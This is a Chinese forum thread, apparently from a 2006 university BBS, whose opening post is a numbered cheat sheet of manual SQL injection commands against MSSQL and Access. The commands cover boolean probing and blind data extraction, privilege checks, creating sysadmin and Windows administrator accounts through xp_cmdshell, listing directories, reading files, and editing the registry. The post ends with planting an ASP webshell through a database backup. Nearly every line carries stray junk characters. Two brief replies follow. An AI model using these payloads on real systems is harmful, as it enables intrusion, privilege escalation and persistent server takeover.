社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4529阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 7t` <`BY^  
  2.初步判断是否是mssql ;and user>0 Mp; t?C4  
HRi~TZ?\  
  3.注入参数是字符'and [查询条件] and ''=' D4'"GaCv  
mtuq  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' g(<02t!OT=  
m3XL;1y:a  
  5.判断数据库系统 B#o(21s  
Dr6"~5~9w  
  ;and (select count(*) from sysobjects)>0 mssql t+Mr1e  
XP5q4BM  
  ;and (select count(*) from msysobjects)>0 access =:`1!W0I  
T_Q/KhLU  
3 2Q/4  
[YP8z~  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 A@*P4E`xp  
 A$ %5l  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 G;615p1  
@va{&i`%A7  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ZmO/6_nU?  
?6Cbx6  
  9.(1)猜字段的ascii值(access) uoFH{.)  
#/sKb2eQ  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 u,[Yaw"L  
)/2* <jr  
  (2)猜字段的ascii值(mssql) jo=XxA  
y=YD4m2W  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 &Th/Qv}[  
&5/`6-K  
  10.测试权限结构(mssql) g#`(& k  
$/,qw   
3?Y%|ZVM  
(xK=/()}q  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- rgILOtk[  
7;Km J}$  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- |Z6rP-  
T :CsYj1  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- $f>Mz|j  
VY<v?Of i-  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- : QSlctW  
CZE5RzG  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- t)g1ICt  
Zb-TCS+3l  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- &9PzBc  
xuO5|{h  
  ;and 1=(select IS_MEMBER('db_owner'));-- oLk>|J  
a}`4BMi3  
UY j  
JI )+  
  11.添加mssql和系统的帐户 1 Y@6oT  
gj\r>~S  
  ;exec master.dbo.sp_addlogin username;-- ;3Fgy8 T  
  ;exec master.dbo.sp_password null,username,password;-- eB/3MUz1  
VJD$nh #M5  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- N::_JH? ^=  
`y0ZFh1>X  
  ;exec master.dbo.xp_cmdshell 'net user username password 00?^!';  
&bh?jW  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- K>Fo+f  
nlH H}K  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- kP%'{   
X1:|   
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- UBpYR> <\  
Rg<y8~|'}  
A)040n  
G hLgV  
  12.(1)遍历目录 C2AP   
(rt DT  
  ;create table dirs(paths varchar(100), id int) Um;ReJ8z  
sq*R)cZ  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' U/yYQZ\)  
56u'XMB?  
  ;and (select top 1 paths from dirs)>0 ckP&N:tC  
ko im@B  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 1 dz&J\|E#  
/-E>5wU  
tb AN{pX  
~zRUJ2hD!  
  (2)遍历目录 PmvTCfsg  
Gw!jYnU  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ")ow,r^"  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 )<DL'  
:~:(49l  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Y1{6lhxgE  
E8jdQS|i  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 &AGV0{NMh]  
&k&tkE  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 HCb7 `(@  
 gsc/IUk  
%,a.431gi  
:CSys62  
  13.mssql中的存储过程 [HtU-8:  
l+kI4B7--  
  xp_regenumvalues 注册表根键, 子键 -{pcb7.xuv  
$]\N/}1v  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ]5x N^7_!j  
KmEm  
  xp_regread 根键,子键,键值名 7\JRHw  
p}R)qz-=5U  
  ;exec xp_regread PLg`\|  
p4<&NMG  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 `iv,aQ '  
&kXf)xc<~  
  xp_regwrite 根键,子键, 值名, 值类型, 值 )eY3[>`  
-[`,MZf   
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 U;;vNzcn  
0u QqPF t  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 FlD !?  
& @^|=>L  
  xp_regdeletevalue 根键,子键,值名 DDN#w<#  
5Tb93Q@c  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 }OI;M^5L  
 s4;SA  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 q3T'rw%Eh  
?5'UrqYSW  
<bXfjj6YJ@  
"1&C\}.7  
  14.mssql的backup创建webshell #]:yCiA  
U|u v SJ)X  
  use model `DC)U1  
G~8C7$0z  
  create table cmd(str image); ~7 C` a$  
fph*|T&R  
  insert into cmd(str) values (''); epW;]> l  
!(w\%$|  
  backup database model to disk='c:\l.asp'; 7tUl$H;I/R  
q,^^c1f  
)+N%!(ki  
^&h|HO-5  
  15.mssql内置函数 a)Qx43mOS  
o9<jj>R;  
  ;and (select @@version)>0 获得Windows的版本号 r?\hZ*|M  
@/`b:sv&*  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa <{9E.6G`n  
[US.n +G6  
  ;and (select user_name())>0 爆当前系统的连接用户 fwf]1@#   
;l &mA1+  
  ;and (select db_name())>0 得到当前连接的数据库 OY51~#BF  
'd|_i6:y&  
jv5p_v4%O  
u(\b1h n  
  16.简洁的webshell +<Uc42i7n  
. ?[2,4F;  
  use model ^B1Q";# B^  
+*DXzVC  
  create table cmd(str image); .B"h6WMz  
]. IUQ*4t  
  insert into cmd(str) values (''); /"~CWNa  
i=o<\ {iV:  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
批量上传需要先选择文件,再选择上传
认证码:
验证问题:
10+5=?,请输入中文答案:十五